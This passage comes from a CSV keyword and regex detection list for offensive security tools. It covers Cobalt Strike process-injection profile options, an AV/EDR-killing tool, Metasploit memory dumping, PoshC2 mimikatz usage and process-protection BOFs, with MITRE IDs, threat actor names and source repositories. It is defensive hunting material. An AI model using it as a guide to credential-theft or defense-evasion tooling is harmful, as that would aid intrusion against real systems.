Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55492"
"*process_inject_allocator*",".{0,1000}process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55493"
"*process_inject_bof_allocator*",".{0,1000}process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55494"
"*process_inject_bof_reuse_memory*",".{0,1000}process_inject_bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55495"
"*process_inject_execute*",".{0,1000}process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55496"
"*process_inject_min_alloc*",".{0,1000}process_inject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55497"
"*process_inject_startrwx*",".{0,1000}process_inject_startrwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55498"
"*Process_Inject_Struct*",".{0,1000}Process_Inject_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55499"
"*process_inject_transform_x*",".{0,1000}process_inject_transform_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55500"
"*process_inject_userwx*",".{0,1000}process_inject_userwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55501"
"*process_killer.exe*",".{0,1000}process_killer\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","55502"
"*process_memdump.rb*",".{0,1000}process_memdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55503"
"*process_mimikatz*",".{0,1000}process_mimikatz.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55504"
"*process_protection_enum *",".{0,1000}process_protection_enum\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55505"
"*process_protection_enum*.dmp*",".{0,1000}process_protection_enum.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","55506"
"*process_protection_enum.*",".{0,1000}process_protection_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55507"
"*Process_Protection_Level_BOF.*",".{0,1000}Process_Protection_Level_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55508"
"*Process_Protection_Level_BOF/*",".{0,1000}Process_Protection_Level_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55509"
